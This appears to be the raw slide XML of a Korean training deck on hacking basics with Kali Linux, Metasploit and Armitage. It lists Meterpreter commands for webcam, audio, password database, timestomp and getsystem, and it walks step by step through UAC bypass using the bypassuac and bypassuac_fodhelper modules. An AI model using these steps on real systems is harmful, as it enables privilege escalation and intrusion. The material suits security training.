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71" r:id="rId2"/>
    <p:sldId id="272" r:id="rId3"/>
    <p:sldId id="490" r:id="rId4"/>
    <p:sldId id="520" r:id="rId5"/>
    <p:sldId id="496" r:id="rId6"/>
    <p:sldId id="521" r:id="rId7"/>
    <p:sldId id="523" r:id="rId8"/>
    <p:sldId id="522" r:id="rId9"/>
    <p:sldId id="524" r:id="rId10"/>
    <p:sldId id="525" r:id="rId11"/>
    <p:sldId id="526" r:id="rId12"/>
    <p:sldId id="540" r:id="rId13"/>
    <p:sldId id="541" r:id="rId14"/>
    <p:sldId id="542" r:id="rId15"/>
    <p:sldId id="543" r:id="rId16"/>
    <p:sldId id="544" r:id="rId17"/>
    <p:sldId id="527" r:id="rId18"/>
    <p:sldId id="535" r:id="rId19"/>
    <p:sldId id="536" r:id="rId20"/>
    <p:sldId id="537" r:id="rId21"/>
    <p:sldId id="538" r:id="rId22"/>
    <p:sldId id="539" r:id="rId23"/>
    <p:sldId id="493" r:id="rId24"/>
    <p:sldId id="528" r:id="rId25"/>
    <p:sldId id="529" r:id="rId26"/>
    <p:sldId id="530" r:id="rId27"/>
    <p:sldId id="531" r:id="rId28"/>
    <p:sldId id="532" r:id="rId29"/>
    <p:sldId id="533" r:id="rId30"/>
    <p:sldId id="534" r:id="rId31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hee0" initials="e" lastIdx="1" clrIdx="0">
    <p:extLst>
      <p:ext uri="{19B8F6BF-5375-455C-9EA6-DF929625EA0E}">
        <p15:presenceInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" userId="ehee0" providerId="None"/>
      </p:ext>
    </p:extLst>
  </p:cmAuthor>
  <p:cmAuthor id="2" name="KITRI" initials="K" lastIdx="1" clrIdx="1">
    <p:extLst>
      <p:ext uri="{19B8F6BF-5375-455C-9EA6-DF929625EA0E}">
        <p15:presenceInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" userId="KIT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E5F"/>
    <a:srgbClr val="B7D7D8"/>
    <a:srgbClr val="EDF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543" autoAdjust="0"/>
    <p:restoredTop sz="86375" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="75" d="100"/>
          <a:sy n="75" d="100"/>
        </p:scale>
        <p:origin x="1122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37072-8A57-4D8F-8E5E-706A18DAD831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C8E30-6D6C-44F2-A0D6-F7FABD7E3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565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902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26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589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208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47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94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0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922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4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497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05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53EB0-527D-4C67-B9EE-33D40AF6BC98}" type="datetimeFigureOut">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>2020-10-30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28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B7D7D8"/>
          </a:fgClr>
          <a:bgClr>
            <a:srgbClr val="EDF7F5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1898EFCF-EF1C-40AB-BA71-A382CFBBA3B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="2724152" y="-57143"/>
            <a:ext cx="2298698" cy="546099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531" y="1996900"/>
            <a:ext cx="4933945" cy="1352903"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"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Kali Linux</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR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해킹 기초</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="부제목 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F900AFB5-8FB4-429A-A1A5-D8BC883EC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9568" y="4009144"/>
            <a:ext cx="4841870" cy="842224"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="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MetaSploit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Armitage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이용한 해킹 기초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</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="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by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KITRI TEAM2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r"/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부제목 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06F177C7-6D0D-4007-B8F7-9FF245EC85AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1579568" y="8612409"/>
            <a:ext cx="4841870" cy="842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김규보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이재영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문관필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양정환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염찬호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김홍규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053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329930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명령어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0A925B45-CEDF-45C9-94E9-7C5C17032077}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="451772" y="2960760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D1E116AA-8D25-4B5F-B3B5-791A2D525E98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="428872" y="3411920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4508A507-D421-4363-9BB2-1B1C8E4FACC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="489872" y="2330760"/>
            <a:ext cx="6114124" cy="583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168B9EEC-7191-489A-B06E-51C5C3CF2117}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="460923" y="1871178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System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명령어</a:t>
            </a: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9B5CEEE8-F64F-4C49-9278-9397D71D5B4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472381" y="6627770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 User Interface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명령어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5A898A-91DF-4509-8C2F-5A93CB591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17" y="2419270"/>
            <a:ext cx="5679789" cy="40345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6CCCB06-6B82-453E-B2EC-B7C02BF4A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17" y="7029401"/>
            <a:ext cx="5679789" cy="240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52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329930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명령어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0A925B45-CEDF-45C9-94E9-7C5C17032077}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="451772" y="2960760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D1E116AA-8D25-4B5F-B3B5-791A2D525E98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="428872" y="3411920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4508A507-D421-4363-9BB2-1B1C8E4FACC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="489872" y="2330760"/>
            <a:ext cx="6114124" cy="583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168B9EEC-7191-489A-B06E-51C5C3CF2117}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="460923" y="1871178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6. Webcam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명령어</a:t>
            </a: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9B5CEEE8-F64F-4C49-9278-9397D71D5B4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="489872" y="3702729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7. Audio Output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명령어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4314B2-8C5A-4653-82DC-1B5F53D04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2" y="2330760"/>
            <a:ext cx="5874378" cy="12503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17A3737-31A3-4830-8920-FC5462993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45" y="4067550"/>
            <a:ext cx="5874378" cy="924141"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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E3B07E50-E110-4660-93CE-1F5B06E7239C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="489872" y="5108909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8. Elevate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명령어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90CB719-BD18-4E98-A4F4-2ABD460402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2" y="5513033"/>
            <a:ext cx="5874378" cy="1152686"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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69FCBDE7-6D6D-4938-BB54-29C123F69A6C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="489872" y="6915939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9. Password database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명령어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4CD2631-88DC-4EE8-AF1B-3E9E922C1F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2" y="7344064"/>
            <a:ext cx="5874378" cy="773718"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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C47B7518-8A7B-4DAE-9E6E-36B477A43761}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472383" y="8229084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10.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Timestomp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명령어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C598D580-456C-41F3-9756-F024932003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22" y="8650880"/>
            <a:ext cx="5874378" cy="77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525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42544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en-US" altLang="ko-KR" sz="280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 명령어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5968750-2E37-4B97-8062-6644A120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2" y="1968500"/>
            <a:ext cx="5913236" cy="354967"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>11. getsystem </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>명령어</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p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71A92288-398E-4BA4-BA7E-EEB39A30AA27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="518072" y="3451276"/>
            <a:ext cx="5913238" cy="35107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getsystem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C2A29F-6F9A-449D-8EB4-1AF77B5D41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8072" y="3943419"/>
            <a:ext cx="5913238" cy="806381"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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BD2C9A3D-C597-484B-974E-9B80718C499E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="518072" y="5153111"/>
            <a:ext cx="5913238" cy="35107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run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post/windows/gather/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win_privs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4B924A-B21D-4FC9-9BC4-7528599740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8072" y="5656877"/>
            <a:ext cx="5913238" cy="113792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76007ED-710B-46FA-901E-D0E4D36BB854}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3657600" y="6215743"/>
            <a:ext cx="885371" cy="579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46A4ED66-97B4-4AF8-BB0C-7C111CEABE23}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="518072" y="6947489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Win_priv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모듈을 통해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UAC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기능을 확인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※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UAC(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계정 컨트롤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</a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Noto Sans Korean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프로그램에서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관리자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수준의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권한이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필요한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작업을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수행할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때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이를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사용자에게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알려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제어할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수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있도록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도와주는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윈도우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운영체제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기능으로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악성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프로그램이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자동으로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설치되는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것을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방지하여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시스템을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손상시키지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않도록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도움을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Noto Sans Korean"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR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준다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Noto Sans Korean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600" dirty="0">
              <a:effectLst/>
              <a:latin typeface="굴림" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              <a:ea typeface="굴림" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              <a:cs typeface="굴림" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
            </a:endParaRP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87980E62-43C4-425D-9CB7-77CCE78CE754}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="518072" y="2590549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getsystem </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR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명령어를 통해 시스템 권한 획득을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시도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A9AC389F-107D-4D49-BB48-AE57A0F0F501}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="378372" y="2956294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ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>        →</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="18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권한 획득 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="200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실패</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2000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687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66699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en-US" altLang="ko-KR" sz="280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 명령어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BD2C9A3D-C597-484B-974E-9B80718C499E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="518068" y="2315603"/>
            <a:ext cx="5913238" cy="35107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background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46A4ED66-97B4-4AF8-BB0C-7C111CEABE23}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="518072" y="6058489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61090C6-A134-484C-AF52-1E1B1EF3C0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0968" y="3501043"/>
            <a:ext cx="5537346" cy="970265"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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C8A7B70E-08B7-4C85-B5D1-E805E4731832}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="860967" y="4567424"/>
            <a:ext cx="5513192" cy="35107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</a:t>
            </a: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sessions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="18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–i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="18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1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B37CD11-0840-4687-AC23-94801958F62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5567" y="5017412"/>
            <a:ext cx="5550052" cy="433290"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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0200898-4D12-41C3-BEC6-735FF1C71EC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="518070" y="1854512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세션을 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backgroun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보냄 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Alt + tab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같은 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9ACCD95D-6F11-4317-B526-93A9928F2991}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="485077" y="5600051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계정컨트롤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(UAC)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기능 우회공격 시도</a:t>
            </a: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94435D1F-A5F3-47AB-96FA-4EF6082615A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="518068" y="6219505"/>
            <a:ext cx="5913238" cy="77663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msf exploit(handler) &gt; use exploit/windows/local/bypassuac</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="123825"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900" kern="1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msf exploit(windows/local/bypassuac) &gt; show options</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1900" kern="10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3921716D-9C91-465A-8E98-A57D872B3174}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="518070" y="2792166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※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되돌아 오는 방법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C1822610-C1D4-41A4-98A9-D4AEB347E9EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="860967" y="3127281"/>
            <a:ext cx="5570335" cy="35107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show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sessions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1D387F30-0772-45FA-BB9F-A72AA438C862}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="510477" y="5876697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→ bypassuac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모듈을 이용</a:t>
            </a:r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0FF8E5E-794E-43F5-800E-055639F24AC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8067" y="7080053"/>
            <a:ext cx="5880245" cy="227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93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66699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en-US" altLang="ko-KR" sz="280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 명령어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BD2C9A3D-C597-484B-974E-9B80718C499E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="518068" y="2315604"/>
            <a:ext cx="5913238" cy="45331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msf5 exploit(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="200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windows/local/bypassuac</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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&gt; sessions</a:t>
            </a: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46A4ED66-97B4-4AF8-BB0C-7C111CEABE23}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="518072" y="5893389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0200898-4D12-41C3-BEC6-735FF1C71EC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="340270" y="1854512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sessions </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR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명령어로 세션 확인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세션 설정 </a:t>
            </a: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9ACCD95D-6F11-4317-B526-93A9928F2991}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472377" y="5142851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5) exploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR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이와 같은 메시지 뜨면서 실패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94435D1F-A5F3-47AB-96FA-4EF6082615A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="518068" y="5876606"/>
            <a:ext cx="5913238" cy="35107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msf5 exploit(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="180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windows/local/bypassuac</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="18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&gt; exploit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DDABC43-0F9A-41C9-8902-6A00FCCE1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9495" y="3368315"/>
            <a:ext cx="5856092" cy="1153795"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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ECB41A53-2AD8-45AC-B57E-92EC27DB936C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="518068" y="2810726"/>
            <a:ext cx="5913238" cy="45331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msf5 exploit(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="200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windows/local/bypassuac</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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&gt; set session 1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2597F4B-04CB-4701-986A-76A93AEA6E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1996" y="6336261"/>
            <a:ext cx="5909310" cy="59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62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66699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2. MetaSploit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 명령어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BD2C9A3D-C597-484B-974E-9B80718C499E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="518068" y="2315604"/>
            <a:ext cx="5913238" cy="45331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msf5 exploit(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="200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windows/local/bypassuac</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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&gt; search bypassuac</a:t>
            </a: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46A4ED66-97B4-4AF8-BB0C-7C111CEABE23}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="518072" y="5474289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0200898-4D12-41C3-BEC6-735FF1C71EC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="340270" y="1854512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6)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백그라운드 한 뒤 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fodhelper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공격</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR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94435D1F-A5F3-47AB-96FA-4EF6082615A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="518067" y="5458457"/>
            <a:ext cx="6004619" cy="35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msf exploit(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="160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windows/local/bypassuac</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="16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&gt; use exploit/windows/local/bypassuac_fodhelper</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="16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7244056-4560-40F1-9BBC-DB63CF61C9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8067" y="2849729"/>
            <a:ext cx="5913235" cy="224917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90AF2FB-132E-4A8C-B1FC-3AE5C57E216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8067" y="5845319"/>
            <a:ext cx="5731510" cy="311785"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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C04D1033-9091-48B4-BEEF-C43884B682CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472381" y="6772395"/>
            <a:ext cx="5913238" cy="3646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msf5 exploit(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="200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windows/local/bypassuac_fodhelper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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&gt; sessions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98B9CB7-24C9-45CC-9BEC-6B79866AADC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43808" y="7825105"/>
            <a:ext cx="5856092" cy="1153795"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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B6707F13-DE4D-40DC-A7BF-2874B803ABF3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472381" y="7267517"/>
            <a:ext cx="5913238" cy="36468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msf5 exploit(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="200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windows/local/bypassuac_fodhelper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="200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&gt; set session 1</a:t>
            </a:r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A929E654-8E50-446B-931D-D38C5659BCCA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="340270" y="6362999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7)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세션 확인 후 설정</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR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439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66699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2. MetaSploit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 명령어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BD2C9A3D-C597-484B-974E-9B80718C499E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="518068" y="2315604"/>
            <a:ext cx="5913238" cy="45331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0500" indent="-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msf exploit(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" kern="10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windows/local/bypassuac_fodhelper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" kern="10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 &gt; exploit</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1800" kern="10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46A4ED66-97B4-4AF8-BB0C-7C111CEABE23}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="518072" y="5474289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80200898-4D12-41C3-BEC6-735FF1C71EC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="340270" y="1854512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8) exploit</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR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94435D1F-A5F3-47AB-96FA-4EF6082615A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
